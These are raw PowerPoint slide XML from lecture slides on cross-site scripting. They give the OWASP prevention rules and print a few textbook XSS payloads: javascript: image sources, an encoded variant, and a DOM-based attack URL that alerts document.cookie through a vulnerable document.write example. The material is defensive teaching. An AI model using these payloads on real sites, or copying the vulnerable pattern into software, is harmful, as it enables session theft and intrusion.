                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>alert(‘XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>’);&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image tag (with UTF-8 encoding): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>javascript:alert(’XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>')&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=j&amp;#X41vascript:alert(’XSS')&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294996936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DOM-Based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This type of attack happens when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> values are used to modify the document through the DOM interface</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;select&gt;&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("&lt;OPTION value=1&gt;"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.location.href.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.location.href.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("default=")+8)+"&lt;/OPTION&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("&lt;OPTION value=2&gt;English&lt;/OPTION&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Normal: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.some.site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>page.html?default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=French</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Attack: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.some.site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>page.html?default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237653117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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS is very difficult to prevent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every piece of data that is returned to the user and that can be influenced by the inputs to the application must first be sanitized (GET parameters, POST parameters, cookies, request headers, database contents, file contents)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specific languages (e.g., PHP) often provide routines to prevent the introduction of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitization has to be performed differently depending on where the data is used </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334517116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0: Never Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directly in a script: &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside an HTML comment: &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In an attribute name: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NEVER PUT UNTRUSTED DATA HERE...=test /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a tag name: &lt;NEVER PUT UNTRUSTED DATA HERE... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="/test" /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273686504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1: HTML Escape Before Inserting Untrusted Data into HTML Element Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;body&gt;...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;div&gt;...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The characters that affect XML parsing (&amp;, &gt;, &lt;, “, ‘, /) need to be escaped</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3807807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Less-Used Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE requests that the origin server delete the resource identified by the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TRACE invokes a remote, application-layer loop-back of the request message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TRACE allows the client to see what is being received at the other  end of the request chain and use that data for testing or diagnostic  information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CONNECT is used with proxies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415374834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2: Attribute Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Data into HTML Common Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside unquoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attributes can be “broken” using many characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside single-quoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attributes can be broken only using the single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside double-quoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attributes can be broken only using the double quote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13038054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3: JavaScript Escape Before Inserting Untrusted Data into HTML JavaScript Data Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a quoted string: &lt;script&gt;alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a quoted expression: &lt;script&gt;x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a quoted event handler: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163191892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4: CSS Escape Before Inserting Untrusted Data into HTML Style Property Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;style&gt;selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } &lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;style&gt;selector { property : “...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...”; } &lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;span style=property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...;&gt;text&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383916087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Solutions to XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RULE 5: URL Escape Before Inserting Untrusted Data into HTML URL Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A normal link: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&gt;link&lt;/a &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An image source: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...' /&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A script source: &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..." /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243939186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#6 - Sanitize HTML Markup with a Library Designed for the Job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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132531988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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RULE #7 - Prevent DOM-based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Untrusted data should only be treated as displayable text. Never treat untrusted data as code or markup within JavaScript code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always JavaScript-encode and delimit untrusted data as quoted strings when entering the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“…”), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>element.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“…”,”value”), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>element.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(…), etc., to build dynamic interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid use of HTML rendering methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>element.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “…”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>element.outerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “…”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(…); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.writeln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(…); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand the dataflow of untrusted data through your JavaScript code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44189860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Solutions to XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check out the cross-site prevention cheat sheet and the DOM-based XSS prevention cheat sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/OWASP/CheatSheetSeries/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PortSwigger’s</a:t>
            </a:r>
            <a:r>
